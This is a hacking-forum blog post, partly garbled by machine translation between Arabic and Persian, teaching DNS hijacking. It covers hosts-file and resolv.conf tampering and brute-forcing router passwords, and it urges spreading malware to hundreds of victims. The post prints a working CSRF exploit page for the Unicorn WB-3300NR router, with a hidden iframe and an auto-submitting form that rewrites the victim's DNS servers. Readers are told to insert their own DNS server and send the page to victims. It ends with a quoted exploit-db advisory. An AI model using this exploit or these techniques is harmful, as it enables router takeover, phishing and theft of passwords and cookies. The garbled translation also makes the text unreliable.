Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)

↑ Grab this Headline Animator

Follow @KAMINDOZ Tweet to @KAMINDOZ

كثير من الناس قد تنظر في هذا Nknn DNS أن أجهزة التوجيه الخاصة بهم على النظام أو ما إذا كان يمكن الاعتماد عليه أم لا.

فإننا نفترض أن استخدام DNS آمن.در صورتی که بر روی آن DNS Server حملات مبتنی بر DNS انجام شده باشد به راحتی می توانند با عملیات های فیشینک پسورد های شما و یا کوکی های شما را بدزدند و یا با جعل سرور های Update سیستم عامل و یا هر گونه برنامه ای که شما النظام يمكن أن يكون سيئا المدى على النظام الخاص بك وتصيب جهاز الكمبيوتر الخاص بك.

الدفاع
لمنع الملقم DNS يعرف أفضل من استخدام المثال جوجل DNS خادم العامة التي يمكنك استخدام عنوان IP 8.8.8.8 و 8.8.4.4


هجوم

كيف يمكننا تغيير ضحايا DNS


الأسلوب الأول
النظام يمكن الحصول على الوصول الفعلي إلى خصائص TCP / IP DNS الشخصية للصفحة الشخصية، قم بتغيير خادم DNS الخاص بك كما هو موضح أدناه:

 لتغيير DNS على خادم لينكس، افتح الملف وDNS التالية نضع أنفسنا في

كود PHP:
/etc/resolv.conf
حل سوف تتغير محتويات الملف كما هو موضح أدناه.
كود PHP:
خادم الأسماء 8.8.8.8
خادم الأسماء 4.2.2.2
بدلا 8.8.8.8 - 8.8.4.4 DNS Khvman لوضع لدينا





الطريقة الثانية لتغيير ملف المضيفين

فایل hosts فایلی می باشد که با آن می توانید dns record ها را به صورت دستی قرار دهید مثلا سیستم به جای بررسی dns server برای پیدا کردن آیپی سایت از این فایل کمک می گیرد مثلا برای بدست آوردن سایت x.com در مرحله ی اول این ملف للتحقق مما إذا كان الموقع عبارة عن سجل من عناوين IP المدرجة في الاستخدامات قياسية.
افتراضيا، ملف المضيفين يجب أن يكون كما يلي:

هايل المسار C: \ WINDOWS \ SYSTEM32 \ السائقين \ الخ \ المضيفين


في نظام التشغيل 

# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#127.0.0.1 localhost 

در Windows Vista

کد PHP:

# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#127.0.0.1 localhost::1 localhost 

در Windows 7

کد PHP:

# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# localhost name resolution is handle within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost 

در سیستم عامل های لینوکسی فایل hosts در مسیر زیر قرار دارد

کد PHP:

/etc/hosts 

برای انجام عملیات رکورد های خدمان را به صورت زیر اضافه کنیم

کد PHP:

ip site.com 

مثلا

کد PHP:

192.168.1.55 drgoogle.com 

به سادگی می توانید یک بدافزار ساده برای این کار طراحی کنید و آن را انتشار دهید و ۱۰۰ ها قربانی را مورد نفوذ قرار دهید.



روش بعدی تغییر DNS درون مودم ها و یا روتر های قربانی می باشد

دسترسی فیزیکی : مثلا در عکس زیر مکان تغییر DNS را درون یک مودم ZYXEL می باشد که شما در دسترسی فیزیکی می توانید آن را تغییر دهید.

دسترسی ریموت : خیلی از مودم ها از طریق وب می توان به آن ها دسترسی پیدا کرد مثلا وارد آیپی آن شد و نام کاربری و پسورد پیشفرض آن را وارد کرد مثلا "123456" و یا "admin" و یا در صورت نیاز از طریق حملات BruteForce به پسورد مودم دسترسی پیدا کرد و بعد از ورود مانند شکل زیر dns هارا تغییر داد

حملات مبتنی بر XSRF : در این نوع حملات کافی است قربانی را به یک سایت دعوت کنید و قربانی سایت شما را باز کند به صورت خودکار DNS ها تغییر می کند.

چگونگی حمله : پیدا کردن مدل مودم قربانی و پس از آن پیدا کردن باگ XSRF و پس از آن اکسپلویت کردن آن
مثلا فرض می کنیم مدل مودم تارگت ما Unicorn Router WB-3300NR می باشد با جستجو یک باگ XSRF پیدا می کنیم و فرم HTML آن و یک دستور ساده برای submit کردن فرم آن طراحی می کنیم مانند مثال زیر

کد PHP:

<html><body>
<iframe height=0 width=0 id="cantseeme" name="cantseeme"></iframe>
<form name="csrf_form" action="http://192.168.123.254/goform/AdvSetDns" method="post" target="cantseeme">
<input type="hidden" name="GO" value='wan_dns.asp'>
<input type="hidden" name="rebootTag" value=''>
<input type="hidden" name="DSEN" value='1'>
<input type="hidden" name="DNSEN" value='on'>
<input type="hidden" name="DS1" value='8.8.4.4'>
<input type="hidden" name="DS2" value='8.8.8.8'>
<script>document.csrf_form.submit();

 
در کد بالا 192.168.12.254 را با آیپی هدف مثلا 192.168.1.1 تغییر می دهیم و 8.8.8.8 - 8.8.4.4 را با dns server خودمان تغییر داده و کد بالا را در قالب یک فایل html آپلود کرده و به قربانی می دهیم و بعد از آن زمانی که قربانی سایت ما را باز کند فرم شبیه سازی شده ارسال و DNS ها تغییر می کنند


روش های بالا روش هایی خوبی بود ولی ۱۰۰ ها روش دیگر برای اینگونه حملات موجود می باشد


منابع :
http://www.exploit-db.com/exploits/29312
www.anvisoft.com
dr.google

موفق باشید
با علی

__________________
بها: صلوات برای تعجیل در فرج آقا امام زمان

http://idc-team.net/cc/showthread.php?t=1353

# Exploit Title:     Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)

# Exploit Author:    absane

# Blog:              http://blog.noobroot.com

# Discovery date:    October 29th 2013  

# Vendor Homepage:   http://www.eunicorn.co.kr/kimsboard7/_product.php?inc=wb-3300nr   

# Tested on:         Unicorn WB-3300NR v1.0

# Firmware Version:  V5.07.18_ko_UIS02      

***************

*Vulnerability*

***************

The WB-3300NR Unicorn Router suffers from numerous CSRF vulnerabilities.

Considering that by default the administrative pages do not require authentication, countless exploits exist.

******************

*Proof of Concept*

******************

1) Factory Reset

2) Alter the DNS Settings

3) WPA Password Disclosure (possibility)(not proven)

The following PoC code only demostrates that with CSRF and XSS, it might be possible to obtain the WPA password.

However, I have been unable to do so without forcing the router to revert to factory defaults.

منتديات الهكر العراقي , منظمة الاختراق العراقية kamindoz

Share

Tweet

روابط هذه التدوينة قابلة للنسخ واللصق
URL
HTML
BBCode

Tweet Follow @KAMINDOZ Tweet

kamindoz